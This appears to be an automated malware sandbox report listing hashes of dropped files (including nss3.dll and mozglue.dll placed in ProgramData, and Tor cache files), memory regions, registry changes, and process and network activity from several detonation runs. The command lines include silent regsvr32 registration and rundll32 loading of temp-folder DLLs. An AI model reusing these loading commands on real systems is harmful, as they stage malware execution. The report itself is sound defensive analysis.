C:\Users\Admin\AppData\Local\Temp\BFA7.exe
| MD5 | 50eb0c4a6ba4fecfc98d6bce17ee8d67 |
| SHA1 | 54868dc6f2e115dd7f9b21f3b2f2a4091afa8e58 |
| SHA256 | b46311def39da0442d0d01cbd4bfd157177ee3ddd27253cce108c6b661a582d0 |
| SHA512 | 72d670f8a479b9a8d8f98417fd4dd70a5c7da0a92b4568f2d0a7ec0ba54025f870a2e2f511084be28f69188cc48a7990e712a6000902758494606c90be6b804f |
memory/2776-1033-0x0000000004780000-0x0000000004938000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
| MD5 | 878d1999c35fde79c8c40f4b901a9118 |
| SHA1 | 7a6aa769cf6b7bfcf1c9a9a12f86d1f01867d6eb |
| SHA256 | dc802dec06a6841b40778cb6fc210e45ba0ccd9b8d2a41f488bc5cf26dd85c69 |
| SHA512 | 6b11b4b8851e88b56d5b85ddbbf420b18179561e1507c5af4ae54bbd5de84552358d2fdf9daa019839dd344fb18ebe62e783cab28e28f5405cb74e5ffa57af1a |
memory/2200-1026-0x0000000000400000-0x000000000311F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
| MD5 | 0459e3b6f56d34a2af063d1114a39386 |
| SHA1 | 1eb1b9f59dab7a03b9c533dbb0768a5d8dd286e2 |
| SHA256 | c02472aa824eb2ee21c6e20608b46d09bd8a4247dc84d18b44c2ca36ea21e59f |
| SHA512 | 5f3020bac319b22d64d9ed836ed96e8b3c21cf3fbe3bb0ddca3d366b2fa2652e2982de0a5c7b896b56fed0677acba66ea4be4b4913b586fd4f2080d2857cbcd5 |
\Users\Admin\AppData\Local\Temp\BFA7.exe
| MD5 | b12a32d3450c2cd7aae7f9af384b4cac |
| SHA1 | 973641854c881465136f275283c9642f8bad62d5 |
| SHA256 | 388ef1a3c7b241d0583503e836918a2a316d8e4a733fed3ab39c838d73cf91b4 |
| SHA512 | fc6510b724f6af1994c3ef8549dd178a2e986c816a88d4ee6f7ff0d2bb94e3f3b144e547994635a764b43f0127e8bb11dbcd00d26aad6d12a6378626bc2f77c3 |
memory/952-1039-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2140-1036-0x0000000000400000-0x0000000002D3F000-memory.dmp
memory/952-1042-0x0000000000400000-0x0000000000848000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
| MD5 | ec107905993c0e3ea3796938a7703089 |
| SHA1 | 4a8808f5bb1417798986fe5c6ceee88054fe3e7c |
| SHA256 | 88ea05c6230cc8c381064df526862873b066a8103c60b901c74a07354fe9e17d |
| SHA512 | c9773f0045f684e98c6d44140c4865cb0508b4748913157e0a1ce4dfed491cd214ef73717fa7e458f8aeb8ce5b365ab9deac88ca4ad1517ef95b616b1f80b030 |
memory/952-1044-0x0000000000400000-0x0000000000848000-memory.dmp
memory/2776-1045-0x0000000004780000-0x0000000004938000-memory.dmp
memory/2776-1047-0x0000000004960000-0x0000000004B17000-memory.dmp
memory/952-1046-0x0000000000400000-0x0000000000848000-memory.dmp
memory/1400-1041-0x0000000000400000-0x000000000311F000-memory.dmp
memory/1088-1049-0x0000000000E90000-0x0000000001447000-memory.dmp
memory/952-1048-0x0000000000400000-0x0000000000848000-memory.dmp
memory/952-1051-0x0000000000400000-0x0000000000848000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp
| MD5 | 87c43a55b4e2a918cfe1b55e76ae2614 |
| SHA1 | 8bbbf94f531952e818341d10f3ef4f0adcbbe72d |
| SHA256 | 8fd9760d4d20d3e7cabd6353568aa15eff24829eb37f7748c66fdef3dbd13a06 |
| SHA512 | 16d97946a5637d4c73104005f5dc2005088cc8f864aa87eabc9764f173281fee76880bfb7549716f16a5486971dddd8dac50ce4963bbb231a8f95b704bc0586a |
memory/2040-1087-0x0000000073FA0000-0x000000007468E000-memory.dmp
C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe
| MD5 | e310dd02f60bd39f7754bbd048ed9ab1 |
| SHA1 | fe5000fcb8089fb6df1765e4f8ee058e306af55e |
| SHA256 | a7156dd3ffde626580e97668ab180b4f323dc6d45a4eb82cd322bb1447a57cd7 |
| SHA512 | 2ba93386f12e53c6540c94db73fbaf644f4b56dc04c40451a95f7cf107627a0ce0e3f526c3e4ebdecf30c7bb005f4d41636ae8451d8f9f899adca9703f747855 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | 3e7c7c9bb95aed0eecb0c2c958afcbb1 |
| SHA1 | ed25976e78654a721f2df32118293fa8fccfac79 |
| SHA256 | 559165126d6d699c5d3ec8242f2c96d79ec56e121264aa4d1424c0b36c47a046 |
| SHA512 | f42eaec7c49d7986d5cce56cde4d6c5bdc0fec079d6edc7755b7789d4df419edf62e48856ec6a084325238f3421ff14198a43ac876649b5bbce29c288fc9e298 |
C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe
| MD5 | 34414db88b6995ec1fbf40d93c720605 |
| SHA1 | ef16204fbc16b7ab2e644b8336babcfcc5a43478 |
| SHA256 | 5a0fa1cdea8b4c3582226a7367eab18e8d4c303a07eb83f5c395f65bf441aae9 |
| SHA512 | c168f71cd0c4c493ef1819a6e5b40c8a6872aee34304ca108846fcf8da2a09e6b1bb070d79498750a149d8c4e0a0d02f99c9a99e471cc283614b6fab1c1c91b3 |
memory/1580-1132-0x0000000000CB0000-0x0000000001A33000-memory.dmp
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\38DD.exe
| MD5 | 931b31b03a14bd25615834377b2ed256 |
| SHA1 | 899a7e209d3d7e919cf346a49b0bc0877f738383 |
| SHA256 | 1bd7aedd5fcd9f921d0ee481f98a276603447b9721870b8aa13380d4f438c320 |
| SHA512 | ba6b9063fbe70228122f83bdeb70201e9859fd0362c8295b990bf2ae15e04561ee8513b7a0023a58de0ea50e3670a7b815f4afa457203de26a7214ec41ce0a35 |
memory/1088-1158-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
memory/1088-1246-0x0000000000AC0000-0x0000000000AC1000-memory.dmp
memory/1088-1255-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
memory/1088-1272-0x00000000029A0000-0x00000000029A1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
146s
Max time network
154s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 1400 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240221-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
123s
Max time network
134s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1120 wrote to memory of 2476 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2852 wrote to memory of 4464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2852 wrote to memory of 4464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2852 wrote to memory of 4464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
91s
Max time network
153s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1100 wrote to memory of 5084 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1100 wrote to memory of 5084 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1100 wrote to memory of 5084 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win10v2004-20240221-en
Max time kernel
138s
Max time network
158s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4780 wrote to memory of 1416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4780 wrote to memory of 1416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4780 wrote to memory of 1416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1416 -ip 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 588
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
